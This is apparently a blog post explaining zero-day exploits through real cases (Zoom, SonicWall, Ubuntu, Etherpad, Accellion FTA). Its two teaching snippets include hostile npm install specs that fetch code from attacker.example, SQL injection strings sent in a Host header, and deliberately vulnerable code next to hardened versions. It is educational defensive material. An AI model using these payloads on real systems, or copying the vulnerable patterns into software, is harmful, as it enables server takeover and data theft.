DEV Community

Grzegorz Piechnik

What is a zero-day (0-day) exploit? Real-life examples

Zero-day attacks come up from time to time on security blogs. They are usually critical and hard to find, even for experienced researchers. So what does "0-day" actually mean? The name refers to how many days the vendor has had to fix the vulnerability: zero. A zero-day is a flaw that is being exploited, or offered for sale, before the vendor knows about it or has shipped a patch, so at the moment of the attack there is nothing to update to. Let's take a look at some recent attacks of the 0-day type.

Zoom

First, an application that almost everyone has used at least once: Zoom. Vice reported that two zero-day vulnerabilities in Zoom were being offered for sale on the black market. The first is an RCE (remote code execution) in the Windows client; the second affects the macOS client. No further technical details were made public. The asking price for the Windows vulnerability was reportedly $500,000.

SonicWall Email Security

FireEye revealed details of three vulnerabilities that an adversary chained to get into corporate networks and plant a backdoor on the SonicWall Email Security appliance. They are:

  • CVE-2021-20021 - pre-authentication creation of administrative accounts,
  • CVE-2021-20022 - arbitrary file upload after authentication,
  • CVE-2021-20023 - arbitrary file read after authentication.

Chained together, the first bug hands the attacker an admin login without any credentials, and the other two turn that login into an arbitrary file write and read on the appliance.

In the technical description on FireEye's website, we can read that:

"The adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files and emails, and move laterally into the victim organization's network."

https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html

Ubuntu

Security researcher Kevin Backhouse stumbled on two flaws that, combined, let an unprivileged local user create a new administrator account on an Ubuntu desktop system.

Initially, Kevin found that accounts-daemon, the service that keeps track of user accounts, could be crashed or hung by an unprivileged user (a DoS). The second flaw is in how the GNOME display manager (gdm3) reacts: when it asks accounts-daemon how many users exist and gets no answer, it concludes there are none and launches the first-boot setup wizard, which lets whoever is at the console create a new account with administrator rights. That account can then be used to log in with sudo access. A video explaining the finding in detail can be found below.

https://www.youtube.com/watch?v=8IjTq7GBupw

Etherpad

Etherpad is a feature-rich collaborative online text editor. The bugs were found by Paul Gerste, a vulnerability researcher at SonarSource, who noted in his write-up that the project has more than 10,000 stars on GitHub and over 250 available plugins, so it enjoys considerable popularity. The vulnerabilities Paul found are rated critical and, chained together, could have been used to take over the server: the XSS hijacks an administrator's session, and the plugin installer then turns that session into code execution. They are:

  • CVE-2021-34817 - persistent XSS in the chat component,
  • CVE-2021-34816 - argument injection in the plugin installer, which lets a privileged user execute arbitrary code on the server by installing a plugin from an attacker-controlled source.
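To make the argument-injection bug class concrete, here is an added illustrative example (not Etherpad's own code, and not a reproduction of CVE-2021-34816). It models an admin endpoint that takes a plugin name and hands it to a package manager on the command line; npm is assumed as the package manager, the `ep_` allowlist pattern is an assumption for this example, and the hostile inputs are constructed. If the name is not validated, anything npm accepts as a package spec, such as a tarball URL or a git remote, gets installed, so whoever controls the name chooses the code that runs on the server.

```python
"""Argument injection in a plugin installer: vulnerable and hardened forms.

Illustrative code added to this post, not Etherpad's implementation.
Assumptions: npm is the package manager, and legitimate plugin names
match the conservative "ep_..." allowlist below.
"""
import re
from typing import List

# Allowlist for plugin names (an assumption made for this example):
# the "ep_" prefix followed by a conservative npm-style package name.
PLUGIN_NAME_RE = re.compile(r"^ep_[a-z0-9][a-z0-9_.-]{0,63}$")


def is_valid_plugin_name(name: str) -> bool:
    """True only for names that can resolve to a registry package, never
    to a URL, a path, a user/repo shorthand, or a command-line option."""
    return PLUGIN_NAME_RE.fullmatch(name) is not None


def install_argv_vulnerable(name: str) -> List[str]:
    """Vulnerable form: the untrusted name goes straight onto the command
    line. "https://attacker.example/ep_evil.tgz" or
    "git+https://attacker.example/ep_evil.git" are valid npm specs, so the
    package manager fetches attacker-chosen code (install scripts run at
    install time, the plugin itself when the server loads it)."""
    return ["npm", "install", name]


def install_argv_hardened(name: str) -> List[str]:
    """Hardened form: reject anything outside the allowlist, and put the
    conventional end-of-options marker "--" before the name so it can
    never be parsed as an option even if the allowlist is later loosened."""
    if not is_valid_plugin_name(name):
        raise ValueError(f"refusing to install plugin with name {name!r}")
    return ["npm", "install", "--", name]


def classify_spec(spec: str) -> str:
    """Label what a package manager would do with a raw spec. Used by the
    demo to show which inputs the vulnerable form would happily accept."""
    if spec.startswith("-"):
        return "option"             # e.g. --registry=https://attacker.example
    if "://" in spec or spec.startswith("git@"):
        return "remote-url"         # tarball or git remote chosen by attacker
    if "/" in spec or spec.startswith("."):
        return "path-or-shorthand"  # local path or user/repo shorthand
    return "registry-name"


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate name and three hostile ones.
    samples = [
        "ep_headings",
        "https://attacker.example/ep_evil.tgz",
        "git+https://attacker.example/ep_evil.git",
        "--registry=https://attacker.example",
    ]
    for s in samples:
        print(f"{s!r}: vulnerable argv={install_argv_vulnerable(s)} "
              f"kind={classify_spec(s)} allowed={is_valid_plugin_name(s)}")
```

The point of the allowlist is that the check runs on the server, against the only shape a legitimate plugin name can have; escaping or quoting the value would not help, because the package manager interprets a well-formed URL as an instruction, not as data.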

Accellion FTA (File Transfer Appliance)

The Associated Press reported that four vulnerabilities were found in Accellion's FTA (File Transfer Appliance), a legacy file-sharing product. The 0-days were exploited against, among others, banks in New Zealand and the US. All four have CVE entries:

  • CVE-2021-27101 - SQL injection via a crafted Host header,
  • CVE-2021-27102 - OS command execution via a local web service call,
  • CVE-2021-27103 - SSRF via a crafted POST request,
  • CVE-2021-27104 - OS command execution via a crafted POST request.
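The first of these is worth a closer look, because the Host header is rarely treated as attacker input. The following is an added illustrative example, not Accellion's code and not a reproduction of CVE-2021-27101: it models a multi-tenant appliance that picks the tenant from the Host header, once by splicing the header into the query text and once with a bound parameter plus a hostname-shape check. The table, the two tenants and the hostname pattern are all constructed for this example; it runs against an in-memory SQLite database.

```python
"""SQL injection through the HTTP Host header: vulnerable and hardened lookups.

Illustrative code added to this post, not Accellion's. Assumptions: a
"tenants" table keyed by hostname (constructed here), and a hostname
validation pattern that is deliberately simple rather than RFC-complete.
"""
import re
import sqlite3
from typing import List, Tuple

# The Host header is attacker-controlled bytes until proven otherwise.
# Pattern (an assumption for this example): DNS-style labels, optional port.
HOST_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?"          # first label
    r"(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*"    # further labels
    r"(?::\d{1,5})?$"                            # optional port
)


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two tenants served by the same appliance."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tenants (id INTEGER PRIMARY KEY, hostname TEXT, admin_email TEXT)"
    )
    conn.executemany(
        "INSERT INTO tenants (hostname, admin_email) VALUES (?, ?)",
        [
            ("fta.bank-a.example", "admin@bank-a.example"),
            ("fta.bank-b.example", "admin@bank-b.example"),
        ],
    )
    return conn


def is_plausible_host(host_header: str) -> bool:
    """Cheap shape check: anything with quotes, spaces or SQL syntax fails."""
    return HOST_RE.fullmatch(host_header.lower()) is not None


def lookup_tenant_vulnerable(conn: sqlite3.Connection,
                             host_header: str) -> List[Tuple[str, str]]:
    """Vulnerable: string concatenation. A Host header of  x' OR '1'='1
    turns the WHERE clause into a tautology and leaks every tenant; a UNION
    payload reads other tables (sqlite_master here) through the same query."""
    sql = ("SELECT hostname, admin_email FROM tenants WHERE hostname = '"
           + host_header + "'")
    return conn.execute(sql).fetchall()


def lookup_tenant_hardened(conn: sqlite3.Connection,
                           host_header: str) -> List[Tuple[str, str]]:
    """Hardened: reject values that are not hostname-shaped, normalise
    (lower-case, drop the port), then bind the value as a parameter so the
    driver never lets it change the structure of the query."""
    if not is_plausible_host(host_header):
        return []
    host = host_header.lower().split(":")[0]
    sql = "SELECT hostname, admin_email FROM tenants WHERE hostname = ?"
    return conn.execute(sql, (host,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # Constructed sample Host headers: one legitimate, two hostile.
    for host in ["fta.bank-a.example",
                 "x' OR '1'='1",
                 "' UNION SELECT name, sql FROM sqlite_master --"]:
        print(repr(host))
        print("  vulnerable:", lookup_tenant_vulnerable(conn, host))
        print("  hardened:  ", lookup_tenant_hardened(conn, host))
```

The parameter binding is the real fix; the shape check is defence in depth that also stops the header from being abused in places that are not SQL, such as log lines or generated links.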

Sources

https://portswigger.net/daily-swig/zero-day
https://www.accellion.com/company/press-releases/accellion-provides-update-to-fta-security-incident-following-mandiants-preliminary-findings/
https://nvd.nist.gov/vuln/detail/CVE-2021-27101
https://nvd.nist.gov/vuln/detail/CVE-2021-27103
https://nvd.nist.gov/vuln/detail/CVE-2021-27102
https://nvd.nist.gov/vuln/detail/CVE-2021-27104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34816
https://www.vice.com/en/article/qjdqgv/hackers-selling-critical-zoom-zero-day-exploit-for-500000
https://portswigger.net/daily-swig/zero-day-vulnerabilities-in-sonicwall-email-client-led-to-network-access-backdoors-installed
https://portswigger.net/daily-swig/vulnerabilities-in-ubuntu-desktop-enabled-root-access-in-two-simple-steps
